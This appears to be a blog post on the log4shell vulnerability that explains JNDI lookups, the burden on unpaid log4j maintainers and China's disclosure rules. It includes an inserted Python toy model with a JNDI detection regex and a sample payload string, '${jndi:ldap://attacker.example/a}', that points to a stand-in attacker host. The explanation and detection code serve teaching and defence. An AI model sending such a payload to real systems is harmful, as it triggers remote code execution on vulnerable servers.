Into week 3 of what will certainly be a years-long event around this log4shell vulnerability. Some thoughts.

Ok, what is log4shell?

If you are not technically-inclined, please bear with me. I will keep this straightforward! Log4shell is a vulnerability in the log4j logging library.

From the Wikipedia entry of Log4j:

Log4j is an open source logging framework that allows software developers to log data within their applications. This data can include user input.

Emphasis mine. Logging is really important in software development. It helps identify bugs and the root cause of many problems users face. For the purpose of keeping this explanation very simple, I will give a hand-wavy explanation of:

JNDI == a technology which turns shorthand expressions into valuable data. For example, I might want to know what version of the software was running as part of my log. I write {version} into my logging code, and it prints out the software version. Handy! The critical piece here is that JNDI is running code to turn version into something like Java 1.9 in your log.

LDAP == similar to writing google.com into your web browser, this technology allows the main application to retrieve data from some external source, elsewhere on the network/internet.

The log4shell vulnerability came from several good intentions that combined to produce a bad outcome.

  1. Logging user input. Sometimes bugs happen because of what a user types into the software!
  2. Running code fetched remotely. In the exploit case, running a random Java object which is fetched from an LDAP server.

This is how the problem of log4shell comes to be. If we write user input to the log, and the logging software can run commands, and the user input is itself a command, then our log is going to run the command that a user types in! Malicious users can figure out how to craft special input so that our log runs code fetched from a remote server on the internet that we (the owners of this application) do not control.
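As an added illustration, not code from the post or from log4j itself, here is a small Python model of the mechanism just described: the same log message rendered with lookups applied to the whole message (the vulnerable behaviour) and with lookups applied only to the developer's template (the effect of the fix), plus a simple check for JNDI lookup syntax in log lines. The `${version}` lookup value, the `attacker.example` host and the sample log lines are constructed placeholders.

```python
import re

# Toy model of the log4j lookup behaviour described above. Constructed for
# illustration: this is not log4j code; only the ${...} syntax and the
# "jndi:" prefix follow the real library.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")

# Values the logger is allowed to resolve locally (the post's ${version}).
SAFE_LOOKUPS = {"version": "Java 1.9"}

def render(message, remote_calls):
    """Evaluate every ${...} in message. A 'jndi:' expression is the dangerous
    path: vulnerable log4j would contact the named server here; this toy only
    records the attempt in remote_calls. Unknown lookups are left untouched."""
    def resolve(m):
        expr = m.group(1)
        if expr.lower().startswith("jndi:"):
            remote_calls.append(expr)
            return "<object fetched from " + expr[5:] + ">"
        return SAFE_LOOKUPS.get(expr, m.group(0))
    return LOOKUP.sub(resolve, message)

def log_vulnerable(template, user_input):
    """Vulnerable behaviour: user input is spliced into the message before
    lookups run, so anything the user typed is interpreted too."""
    remote_calls = []
    return render(template.replace("{user}", user_input), remote_calls), remote_calls

def log_hardened(template, user_input):
    """Hardened behaviour: lookups are resolved only in the developer's template
    and user input is inserted afterwards, never interpreted (what removing
    message lookups in patched log4j achieves)."""
    remote_calls = []
    return render(template, remote_calls).replace("{user}", user_input), remote_calls

# Detection: flag log lines that contain a JNDI lookup expression.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def find_jndi_lookups(lines):
    return [line for line in lines if JNDI_PATTERN.search(line)]

# Constructed sample log lines; attacker.example is a placeholder host.
SAMPLE_LOG = [
    "GET /login user-agent=Mozilla/5.0",
    "GET /login user-agent=${jndi:ldap://attacker.example/a}",
    "GET /search q=${version}",
]

if __name__ == "__main__":
    hostile_ua = "${jndi:ldap://attacker.example/a}"
    print(log_vulnerable("v=${version} ua={user}", hostile_ua))
    print(log_hardened("v=${version} ua={user}", hostile_ua))
    print(find_jndi_lookups(SAMPLE_LOG))
```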

Open Source, and its costs

I am a major proponent of open source: the idea that software can be freely shared through its source code. I run others’ code on my home network all the time (Paperless-NG, Wiki.js, etc.). The idea that a person or group can build something they are passionate about and share it with the world, allowing the world to modify and improve it over time, is a core principle of what makes the Internet special and unique. Human collaboration is the magic potion that created the world as we know it today! We’ve built bridges, buildings, and monuments by working together. Open Source is the software equivalent.

But in times like this, the costs become readily apparent. From Yawar Amin:

They [the log4j maintainers] worked like a professional team of security-focused engineers, except with zero pay or recognition. They gave up a weekend with their families to do this for almost the entire internet. They were criticized and harassed, and their every action scrutinized:

Tweet: Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people from bashing us, for work we aren’t paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns.

Despite the license attached to the log4j open source library being explicit in stating:

Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.

It is 100% understandable that those who built log4j would feel compelled to correct this problem. It is 1,000% wrong that those who freely took the log4j library did not support the log4j maintainers, either now in this time of crisis or in the past. The many impacted large enterprises could have banded together and donated a few engineers to solving this problem alongside the log4j crew. Expecting the group of people who maintain their passion project to jump on issues instantly is unfair to those individuals. Open Source should be about community.

Funding open source projects and their maintainers is an unsolved problem, and the current incarnation we’re seeing with log4j reminds me of the npm fund debacle from a few years back. We all agree that open source is a good thing; we can’t seem to figure out how to pay for it, though there is plenty of opportunity. See also this.

And then there’s China

This is not great:

China’s internet security regulator has disciplined Alibaba Group Holding’s cloud computing services unit for failing to first report to the government a critical vulnerability in Apache’s Log4j software that has alarmed the cybersecurity community, Chinese media reported on Wednesday.

[…]

Notifying vendors first about security flaws is a cybersecurity industry norm, but a new law encourages Chinese companies to first notify the government

If you look at a problem and think to yourself “how could I create the greatest benefit for myself in this situation?”, well, that’s what China is doing here. They are saying to hell with everyone else in this world, we’re going to unilaterally do the things that most benefit our desire to spy on the rest of the world.

Certainly no nation-state has perfectly clean hands in this, but it feels like a step over some invisible red line to pass a law which tells companies they must disclose vulnerabilities first to their government and then, perhaps only if the government allows them, they can responsibly disclose the vulnerability to the group which has the power to fix it. This is not making the internet safer!

Conclusion

Pay for your tools. Fund open source. Respect maintainers (you know, the people who gave you this awesome thing for free).

And avoid doing business in China, apparently.